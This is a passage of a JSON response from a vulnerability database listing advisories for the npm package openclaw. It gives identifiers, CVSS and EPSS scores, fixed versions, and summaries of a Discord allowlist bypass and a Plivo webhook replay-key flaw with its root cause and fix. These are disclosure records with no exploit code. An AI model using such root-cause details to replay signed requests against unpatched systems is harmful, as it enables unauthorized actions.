ty":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["CVE-2026-41295","GHSA-2qrv-rc5x-2g2h"],"risk_score":3.9,"exploitability":"0.5","weighted_severity":"7.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-una1-gxkk-t3bp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89664?format=json","vulnerability_id":"VCID-uy97-p1ex-y7df","summary":"OpenClaw: Discord Slash Commands Bypass Group DM Channel Allowlist\n## Summary\nDiscord Slash Commands Bypass Group DM Channel Allowlist\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: moderate\n- Assessment: v2026.3.28 native Discord slash and autocomplete paths still skip the group-DM allowlist, but impact is limited to already-authorized Discord users bypassing a channel restriction rather than crossing a stronger trust boundary.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `8fdb19676ab44cf85d47ee13c578195f2e527591` — 2026-03-30T11:17:36-06:00\n\nOpenClaw thanks @nexrin for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41348","reference_id":"","reference_type":"","scores":[{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10417","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10395","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10436","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41348"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/8fdb19676ab44cf85d47ee13c578195f2e527591","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/8fdb19676ab44cf85d47ee13c578195f2e527591"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rvvf-6vh3-9j43","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rvvf-6vh3-9j43"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41348","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41348"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-group-dm-channel-allowlist-bypass-via-discord-slash-commands","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-group-dm-channel-allowlist-bypass-via-discord-slash-commands"},{"reference_url":"https://github.com/advisories/GHSA-rvvf-6vh3-9j43","reference_id":"GHSA-rvvf-6vh3-9j43","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rvvf-6vh3-9j43"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41348","GHSA-rvvf-6vh3-9j43"],"risk_score":2.5,"exploitability":"0.5","weighted_severity":"4.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uy97-p1ex-y7df"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91856?format=json","vulnerability_id":"VCID-v1bp-hw9a-yffz","summary":"OpenClaw: Plivo V2 verified replay identity drifts on query-only variants\n## Summary\nBefore `v2026.3.23`, the Plivo V2 verification path treated query-only variants of the same signed request as fresh verified work. Plivo V2 signatures authenticate `baseUrl + nonce`, but the replay key was derived from the full verification URL including the query string, so unsigned query-only changes minted a new `verifiedRequestKey`.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: `< 2026.3.23`\n- Fixed: `>= 2026.3.23`\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Root Cause\nThe vulnerable logic lived in `extensions/voice-call/src/webhook-security.ts`. V2 signature validation already canonicalized to the base URL without query parameters, but the replay key used the full `verificationUrl`, letting query-only variants bypass replay identity stability.\n\n## Fix Commit(s)\n- `b0ce53a79cf63834660270513e26d921899b4e5b` — `fix(voice-call): stabilize plivo v2 replay keys`\n\n## Release Status\nThe fix commit is contained in released tags `v2026.3.23` and `v2026.3.23-2`. The latest shipped tag and npm release both include the fix.\n\n## Code-Level Confirmation\n- `extensions/voice-call/src/webhook-security.ts` now derives the V2 replay key with `createPlivoV2ReplayKey(...)`, which hashes `getBaseUrlNoQuery(url)` plus the nonce.\n- `extensions/voice-call/src/webhook-security.test.ts` contains the regression test `treats query-only V2 variants as the same verified request`.\n\nThanks @smaeljaish771 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35618","reference_id":"","reference_type":"","scores":[{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.133","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.13342","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.13338","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35618"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:33:06Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/b0ce53a79cf63834660270513e26d921899b4e5b","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:33:06Z/"}],"url":"https://github.com/openclaw/openclaw/commit/b0ce53a79cf63834660270513e26d921899b4e5b"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cg6c-q2hx-69h7","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:33:06Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cg6c-q2hx-69h7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35618","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35618"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-replay-identity-drift-via-query-only-variants-in-plivo-v2-verification","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:33:06Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-replay-identity-drift-via-query-only-variants-in-plivo-v2-verification"},{"reference_url":"https://github.com/advisories/GHSA-cg6c-q2hx-69h7","reference_id":"GHSA-cg6c-q2hx-69h7","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cg6c-q2hx-69h7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110761?format=json","purl":"pkg:npm/openclaw@2026.3.23","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"